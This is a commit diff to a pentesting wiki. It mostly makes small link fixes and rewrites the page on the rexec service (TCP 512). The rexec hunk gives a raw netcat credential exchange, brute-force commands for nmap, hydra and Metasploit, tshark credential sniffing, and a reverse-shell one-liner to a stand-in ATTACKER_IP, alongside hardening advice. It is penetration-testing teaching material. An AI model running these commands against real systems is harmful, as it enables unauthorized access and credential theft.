HackTricks-wiki · carlospolop · Jul 15, 2025 · Jul 15, 2025 · Jul 15, 2025
diff --git a/...and-resources/pentesting-wifi/enable-nexmon-monitor-and-injection-on-android.md b/...and-resources/pentesting-wifi/enable-nexmon-monitor-and-injection-on-android.md
@@ -22,7 +22,7 @@ The same technique applies to any handset that has a publicly available NexMon p
 * NexMon Magisk ZIP or self-compiled patch providing:
   * `/system/lib*/libnexmon.so`
   * `/system/xbin/nexutil`
-* Hijacker ≥ 1.7 (arm/arm64) – https://github.com/chrisk44/Hijacker
+* Hijacker ≥ 1.7 (arm/arm64) – [https://github.com/chrisk44/Hijacker](https://github.com/chrisk44/Hijacker)
 * (Optional) Kali NetHunter or any Linux chroot where you intend to run wireless tools
 
 ---
@@ -130,4 +130,4 @@ Performance on the Galaxy S10 is comparable to external USB NICs (~20 dBm TX, 2-
 * [NexMon – firmware patching framework](https://github.com/seemoo-lab/nexmon)
 * [Hijacker (aircrack-ng GUI for Android)](https://github.com/chrisk44/Hijacker)
 
-{{#include ../../banners/hacktricks-training.md}}
+{{#include ../../banners/hacktricks-training.md}}
diff --git a/src/mobile-pentesting/ios-pentesting/ios-pentesting-without-jailbreak.md b/src/mobile-pentesting/ios-pentesting/ios-pentesting-without-jailbreak.md
@@ -106,7 +106,7 @@ Recent Frida releases (>=16) automatically handle pointer authentication and oth
 
 ### Automated dynamic analysis with MobSF (no jailbreak)
 
-[MobSF](https://mobsf.github.io/Mobile-Security-Framework-MobSF/) can instrument a dev-signed IPA on a real device using the same technique (`get_task_allow`) and provides a web UI with filesystem browser, traffic capture and Frida console【†L2-L3】. The quickest way is to run MobSF in Docker and then plug your iPhone via USB:
+[MobSF](https://mobsf.github.io/Mobile-Security-Framework-MobSF/) can instrument a dev-signed IPA on a real device using the same technique (`get_task_allow`) and provides a web UI with filesystem browser, traffic capture and Frida console【】. The quickest way is to run MobSF in Docker and then plug your iPhone via USB:
 
 ```bash
 docker pull opensecurity/mobile-security-framework-mobsf:latest

diff --git a/src/network-services-pentesting/512-pentesting-rexec.md b/src/network-services-pentesting/512-pentesting-rexec.md
@@ -2,22 +2,115 @@
 
 {{#include ../banners/hacktricks-training.md}}
 
-
 ## Basic Information
 
-It is a service that **allows you to execute a command inside a host** if you know valid **credentials** (username and password).
+Rexec (remote **exec**) is one of the original Berkeley *r*-services suite (together with `rlogin`, `rsh`, …).  It provides a **remote command-execution** capability **authenticated only with a clear-text username and password**.  The protocol was defined in the early 1980’s (see RFC 1060) and is nowadays considered **insecure by design**.  Nevertheless it is still enabled by default in some legacy UNIX / network-attached equipment and occasionally shows up during internal pentests.
 
-**Default Port:** 512
+**Default Port:** TCP 512 (`exec`)
 
 ```
 PORT    STATE SERVICE
 512/tcp open  exec
 ```
 
+> 🔥  All traffic – including credentials – is transmitted **unencrypted**.  Anyone with the ability to sniff the network can recover the username, password and command.
+
+### Protocol quick-look
+
+1. Client connects to TCP 512.
+2. Client sends three **NUL-terminated** strings:
+   * the port number (as ASCII) where it wishes to receive stdout/stderr (often `0`),
+   * the **username**,
+   * the **password**.
+3. A final NUL-terminated string with the **command** to execute is sent.
+4. The server replies with a single 8-bit status byte (0 = success, `1` = failure) followed by the command output.
+
+That means you can reproduce the exchange with nothing more than `echo -e` and `nc`:
+
+```bash
+(echo -ne "0\0user\0password\0id\0"; cat) | nc <target> 512
+```
+
+If the credentials are valid you will receive the output of `id` straight back on the same connection.
+
+### Manual usage with the client
+
+Many Linux distributions still ship the legacy client inside the **inetutils-rexec** / **rsh-client** package:
+
+```bash
+rexec -l user -p password <target> "uname -a"
+```
+
+If `-p` is omitted the client will prompt interactively for the password (visible on the wire in clear-text!).
+
+---
+## Enumeration & Brute-forcing
+
 ### [**Brute-force**](../generic-hacking/brute-force.md#rexec)
 
+### Nmap
 
-{{#include ../banners/hacktricks-training.md}}
+```bash
+nmap -p 512 --script rexec-info <target>
+# Discover service banner and test for stdout port mis-configuration
+
+nmap -p 512 --script rexec-brute --script-args "userdb=users.txt,passdb=rockyou.txt" <target>
+```
+The `rexec-brute` NSE uses the protocol described above to try credentials very quickly .
 
+### Hydra / Medusa / Ncrack
 
+```bash
+hydra -L users.txt -P passwords.txt rexec://<target> -s 512 -t 8
+```
+`hydra` has a dedicated **rexec** module and remains the fastest offline bruteforcer .  `medusa` (`-M REXEC`) and `ncrack` (`rexec` module) can be used in the same way.
 
+### Metasploit
+
+```
+use auxiliary/scanner/rservices/rexec_login
+set RHOSTS <target>
+set USER_FILE users.txt
+set PASS_FILE passwords.txt
+run
+```
+The module will spawn a shell on success and store the credentials in the database .
+
+---
+## Sniffing credentials
+
+Because everything is clear-text, **network captures are priceless**.  With a copy of the traffic you can extract creds without touching the target:
+
+```bash
+tshark -r traffic.pcap -Y 'tcp.port == 512' -T fields -e data.decoded | \
+  awk -F"\\0" '{print $2":"$3" -> "$4}'  # username:password -> command
+```
+
+(In Wireshark enable *Decode As …* TCP 512 → REXEC to view nicely-parsed fields.)
+
+---
+## Post-Exploitation tips
+
+* Commands run with the privileges of the supplied user.  If `/etc/pam.d/rexec` is mis-configured (e.g. `pam_rootok`), root shells are sometimes possible.
+* Rexec ignores the user’s shell and executes the command via `/bin/sh -c <cmd>`.  You can therefore use typical shell-escape tricks (`;`, ``$( )``, backticks) to chain multiple commands or spawn reverse shells:
+  ```bash
+  rexec -l user -p pass <target> 'bash -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"'
+  ```
+* Passwords are often stored in **~/.netrc** on other systems; if you compromise one host you may reuse them for lateral movement.
+
+---
+## Hardening / Detection
+
+* **Do not expose rexec**; replace it with SSH.  Virtually all modern *inetd* superservers comment the service out by default.
+* If you must keep it, restrict access with TCP wrappers (`/etc/hosts.allow`) or firewall rules and enforce strong per-account passwords.
+* Monitor for traffic to :512 and for `rexecd` process launches.  A single packet capture is enough to detect a compromise.
+* Disable `rexec`, `rlogin`, `rsh` together – they share most of the same codebase and weaknesses.
+
+---
+
+
+## References
+
+* Nmap NSE `rexec-brute` documentation – [https://nmap.org/nsedoc/scripts/rexec-brute.html](https://nmap.org/nsedoc/scripts/rexec-brute.html)
+* Rapid7 Metasploit module `auxiliary/scanner/rservices/rexec_login` – [https://www.rapid7.com/db/modules/auxiliary/scanner/rservices/rexec_login](https://www.rapid7.com/db/modules/auxiliary/scanner/rservices/rexec_login)
+{{#include ../banners/hacktricks-training.md}}
diff --git a/src/network-services-pentesting/pentesting-telnet.md b/src/network-services-pentesting/pentesting-telnet.md
@@ -139,4 +139,4 @@ After a shell is obtained remember that **TTYs are usually dumb**; upgrade with
 
 
 
-{{#include /banners/hacktricks-training.md}}
+{{#include ../banners/hacktricks-training.md}}
Original file line number	Diff line number	Diff line change
Expand Up		@@ -139,4 +139,4 @@ After a shell is obtained remember that TTYs are usually dumb; upgrade with



		{{#include /banners/hacktricks-training.md}}
		{{#include ../banners/hacktricks-training.md}}